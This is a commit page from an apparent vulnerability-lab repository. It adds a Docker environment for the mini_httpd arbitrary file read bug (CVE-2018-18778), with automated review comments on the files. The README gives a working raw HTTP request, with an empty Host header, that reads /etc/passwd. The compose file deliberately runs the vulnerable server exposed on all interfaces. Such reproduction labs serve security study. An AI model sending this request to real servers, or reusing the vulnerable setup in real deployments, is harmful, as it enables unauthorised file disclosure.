Merge branch 'mini_httpd-cve-2018-18778'
phith0n committed Nov 1, 2018
2 parents dd5b071 + cc0d848 commit 3269c73
Showing 5 changed files with 88 additions and 0 deletions.
21 changes: 21 additions & 0 deletions base/mini_httpd/1.29/Dockerfile
@@ -0,0 +1,21 @@
FROM buildpack-deps:jessie-curl

ADD debian.patch /debian.patch

RUN set -ex \
&& apt-get update \
&& apt-get install --no-install-recommends -y gcc make libc6-dev patch \
&& wget -qO- http://www.acme.com/software/mini_httpd/mini_httpd-1.29.tar.gz \
| tar zx -C /usr/src --strip-components=1 \
&& cd /usr/src \
&& patch mini_httpd.c < /debian.patch \
&& make \
&& make install \
&& mkdir -p /var/www/html \
&& chown www-data:www-data /var/www/html \
&& rm -rf /usr/src/* /var/lib/apt/lists/* /debian.patch

WORKDIR /var/www/html
EXPOSE 8080

CMD ["mini_httpd", "-p", "8080", "-u", "www-data", "-h", "0.0.0.0", "-d", "/var/www/html", "-D", "-c", "**.cgi", "-l", "/dev/stdout", "-T", "utf-8"]
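Review bot: the source tarball on the line `&& wget -qO- http://www.acme.com/software/mini_httpd/mini_httpd-1.29.tar.gz \` is fetched over plain HTTP and piped straight into `tar`, with no integrity check, so the image build trusts whatever the network returns. Save the archive first and verify a pinned digest before extracting, for example `echo "<sha256-placeholder>  mini_httpd-1.29.tar.gz" | sha256sum -c -` followed by the `tar` step; fetching over https (if the site offers it) adds transport protection but does not replace the pinned checksum. It is also worth a comment that this CMD (with `-d /var/www/html` and `-c "**.cgi"`, without `-v`) is not the command the lab's docker-compose.yml actually runs.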
14 changes: 14 additions & 0 deletions base/mini_httpd/1.29/debian.patch
@@ -0,0 +1,14 @@
--- mini_httpd.c 2018-11-01 13:07:56.856000000 +0000
+++ mini_httpd.patch.c 2018-11-01 13:07:27.148000000 +0000
@@ -98,9 +98,11 @@
#define SIZE_T_MAX 2147483647L
#endif

+/*
#ifndef HAVE_INT64T
typedef long long int64_t;
#endif
+*/

#ifdef __CYGWIN__
#define timezone _timezone
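Review bot: the patch carries no explanation of why the `typedef long long int64_t;` block is commented out (presumably a clash with the toolchain's own `int64_t` definition, but nothing in the file says so); add a one-line header comment stating the reason. Since upstream already guards the typedef with `#ifndef HAVE_INT64T`, building with `HAVE_INT64T` defined would skip it with no source edit; if the Makefile does not let you pass that, note it in the header so the next maintainer knows why a source patch was needed. The `---`/`+++` names also differ (`mini_httpd.c` versus `mini_httpd.patch.c`), which is harmless only because the Dockerfile applies it as `patch mini_httpd.c < /debian.patch`.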
Binary file added mini_httpd/CVE-2018-18778/1.png
46 changes: 46 additions & 0 deletions mini_httpd/CVE-2018-18778/README.md
@@ -0,0 +1,46 @@
# mini_httpd Arbitrary File Read Vulnerability (CVE-2018-18778)

Mini_httpd is a tiny HTTP server that keeps a reasonable level of performance (about 90% of Apache) while consuming few system resources, so it is widely used as an embedded server in all kinds of IoT devices (routers, switches, cameras, etc.). Devices from vendors including Huawei, Zyxel, Hikvision and Raspberry Pi have used the Mini_httpd component.

When mini_httpd is running in virtual host mode, a user request for `http://HOST/FILE` accesses the file `HOST/FILE` under the current directory.

```c
(void) snprintf( vfile, sizeof(vfile), "%s/%s", req_hostname, f );
```

See the code above; the analysis is as follows:

- When HOST=`example.com` and FILE=`index.html`, the statement yields `example.com/index.html`, and the file is read normally.
- When HOST is empty and FILE=`etc/passwd`, the statement yields `/etc/passwd`

The latter is treated as an absolute path, so `/etc/passwd` is read, resulting in an arbitrary file read vulnerability.

## Environment Setup

Run the following command to start mini_httpd 1.29:

```
docker-compose up -d
```

Once the environment is up, visit `http://your-ip:8080` to see the web page.

## Vulnerability Reproduction

When sending the request, leave Host empty; the value of PATH is the absolute path of the file:

```
GET /etc/passwd HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
```

The file is read successfully:

![](1.png)
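Review bot: the analysis section names virtual host mode as the precondition, but the Environment Setup section never says that the bundled docker-compose.yml starts mini_httpd with `-v`, the flag that turns that mode on; add a sentence there so readers know the lab is reachable only because of that option, and that the image's default CMD (which lacks `-v`) does not start the server in the vulnerable mode the README describes.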
7 changes: 7 additions & 0 deletions mini_httpd/CVE-2018-18778/docker-compose.yml
@@ -0,0 +1,7 @@
version: '2'
services:
web:
image: vulhub/mini_httpd:1.29
command: mini_httpd -p 8080 -u www-data -h 0.0.0.0 -D -l /dev/stdout -v -T utf-8
ports:
- "8080:8080"
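Review bot: `- "8080:8080"` publishes the port on every host interface, and the command runs the server with `-v`, the virtual host mode the README identifies as the precondition for the file read, so the lab exposes a deliberately vulnerable service to anything that can reach the host. For a lab compose file bind it to loopback, `- "127.0.0.1:8080:8080"`, and add a comment above `command:` noting that `-v` is what enables the vulnerable behaviour and that this command intentionally diverges from the image's default CMD.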

0 comments on commit 3269c73
